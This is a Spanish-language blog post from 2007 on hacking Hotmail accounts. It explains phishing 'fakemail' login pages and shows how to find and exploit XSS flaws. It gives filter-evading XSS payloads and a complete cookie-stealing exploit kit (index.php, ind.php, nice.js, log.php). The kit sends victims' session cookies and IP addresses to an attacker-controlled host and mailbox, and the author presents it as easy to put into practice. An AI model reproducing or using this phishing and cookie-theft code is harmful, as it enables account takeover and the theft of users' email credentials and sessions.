martes, 31 de julio de 2007

Hacia tiempo tenia ganas de hacer este post, debido a que mucha gente me pregunta como hackear cuentas de correo de hotmail, y la verdad que este tipo de tecnicas no se les puede llamar en si "hacking" aunque tratare de ampliarme lo mas que pueda en XSS Hotmail y el uso de lanzadores o fakemail.

Tengo que aclarar que yo no soy ningun experto en esto y fracamente nunca me ha interesado saber como se consiguen la contrase~a de un correo, si no, que solo me dio curiosidad de saber como hacen este tipos de cosas y cobran bastante bien (lease renthackers).

Aqui voy a tratar temas quizas un poco complejos para la gente que no esta familiarizada con este tipo de cosas, pero que son a las que mas les interesa el tema.

  • Fakemail creacion y uso
  • XSS Hotmail busqueda y explotacion
Fakemail creacion y uso

Los fakemails o lanzadores, no son mas que paginas de login falsas, especialmente creadas para el robo de credenciales legitimas de una entidad electronica, entiendase que los fake no solo son aplicables en entidades de correo electronico, si no que tambien son aplicables a paginas de otro tipo de entidad, en donde sea factible el robo de credenciales.

Existen en internet paginas especialmente dedicadas al uso de este tipos de fake, de facil uso y bastante efectivas, los lanzadores proporcionados son de distintos tipos, pueden ser de los que capturan el password y lo envia al correo del atacante, de los que capturan el password y el atacante tiene que entrar de nuevo a la pagina por el password, o bien paginas que no hacen nada y se quedan con el password para diferentes propositos, ya sea para listas de spam, busqueda de informacion sensible en los correos, distribuir correo basura desde la cuenta.
La programacion de este tipo de sripts no son dificiles de hacer en PHP, ya que se basan unicamente en formularios y en la funciona mail() de PHP, y es esta una de las causas por los que hostings gratuitos no permiten usar esta funcion, debido al correo basura que facilmente se puede implementar asi.

Es impresionante como estos scripts en PHP esta libremente distribuidos por el internet, y estan al alcance de cualquier usuario que este dispuesto a pasar una tarde en su instalacion y modo de empleo.

=================

XSS Hotmail busqueda y explotacion

Encontrar una vulnerabilidad XSS en hotmail no es dificil y tampoco es cosa del otro mundo, utilizando algunas opciones avanzadas de Google en cuestion de segundos tendremos a nuestro alcance un gran banco de pruebas para intentar sacar un XSS

La busqueda de de este tipo de vulnerabilidades es muy sencilla, utilizando los filtros de Google "inurl" y el filtro "site" podemos encontrar muchisimas paginas en las que podemos intentar buscar alguna vulnerabilidad en cualquiera de las varibles pasadas por el metodo GET por URL.

La explotacion de las vulnerabilidades es de igual forma muy sencilla, utilizando entradas especialmente modificadas para saltarse los filtros que han implementado los de hotmail para evitar este tipo de ataques contra sus usuarios, en general se utilizan entradas malformadas basadas en javascripts por ejemplo:

< src="javas&\#09;cript:alert(document.cookie);">
/*NOTA: Agregar a la linea anterior la etiqueta IMG, al parecer Blogger lanzo sus filtros contra mi =P*/

Utilizando la etiqueta IMG de HTML se explota su argumento SRC introduciendole una funcion javascripts para mostrarnos la cookie de la pagina actual, la formacion de este tipo de entradas se puede modificar de manera sencilla, normalmente se pasan algunos caracteres de la entrada a su equivalente en ASCII para evitar que sea detectada por los filtros de hotmail y el navegador web pueda interpretarla sin problemas.

Para realizar ataques un poco mas avanzados que realicen la funcion, que en cuanto se abra el correo electronico, dado como exito el ataque, es utilizando la funcion javascripts document.location.replace() y el uso de diferentes etiquetas HTML, como pueden ser:
  • img src="" dynsrc="javascript:alert('XSS');"
  • input src="javascript:alert('XSS');" type="image"
  • meta equiv="refresh" content="0;url=javascript:alert('XSS');"
  • BR SIZE="&{alert('XSS')}"
Hay infinidad de entradas que pueden ser modificadas para optimizar el uso del XSS, oviamente para explotar este tipo de vulnerabilidades es necesario enviar un correo electronico a la victima en forma de HTML y que contenga cualaquiera de las entradas anteriores, por ejemplo para que sea vulnerado en cuanto abra su correo electronico bastaria con agregar la siguiente:


img src="jAvascrIpt:document.location.replace('http://atacante.com/xploit.js?'+docum
ent.cookie)"

La edicion de esta cadena se puede modificar facilmente, la explotacion automatica de este tipo de vulnerabilidades estan basadas en ciertos xploits que estan distribuibles libremente por el internet, aqui solo me remitire a explicar el uso de uno.

--------INDEX.PHP------------------
<\html\>
<\body\>
<\iframe src="http://ATACANTE.COM/HOTMAIL/ind.php" width="10" height="10" \>
link
<\/iframe\>

--------------------------------------
-------IND.PHP-----------------------------

$mysite = "http://ATACANTE/HOTMAIL/nice.js";
$xpl = "http://VICTIMA.COM/variable=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//ATACANTE.COM/HOTMAIL/nice.js%3E%3C/script%3E";
print'

<\body\>
<\ meta equiv="Refresh" content="1; URL='.$xpl.'" \>
';
?>
---------------------------------------------
------LOG.PHP----------------------------

$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");

$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("mail@atacante.com", $subject, $msg);

header ("location: asd.gif");
?>
--------------------------------------------
---------NICE.JS--------------------------
location.href='http://ATACANTE/HOTMAIL/log.php?nice='+escape(document.cookie)
-------------------------------------------


El uso del exploit es muy sencillo, y facilmente se puede poner en practica, son archivos PHP que en base de un archivo javascripts explotan esta vulnerabilidad y logran obtener la preciada cookie para despues enviar al correo del atacante y este pueda ingresar a la cuenta de la victima.

NOTA: En la edicion de este post me pude percatar de como blogger edito automaticamente algunas cadenas modificadas que habia puesto a modo de ejemplo, y otras que no me edito y que me mostraron la cookie de mis credenciales en blogger, esto demuestra que hasta paginas tan importantes como estas pueden ser vulnerables a este tipo de ataques, oviamente las entradas que ocasionaron estos errores no fueron publicadas y que seran el motivo de un futuro post.

Suerte y hasta la proxima.

xploit

1 comentarios :

  1. Anónimo dijo...

    Tal vez aqui, esto les sirva
    http://www.die3go.site88.net/
    ahi no hay algo como lo que se plantea aqui, pero pueden ver cierta información que no es comun.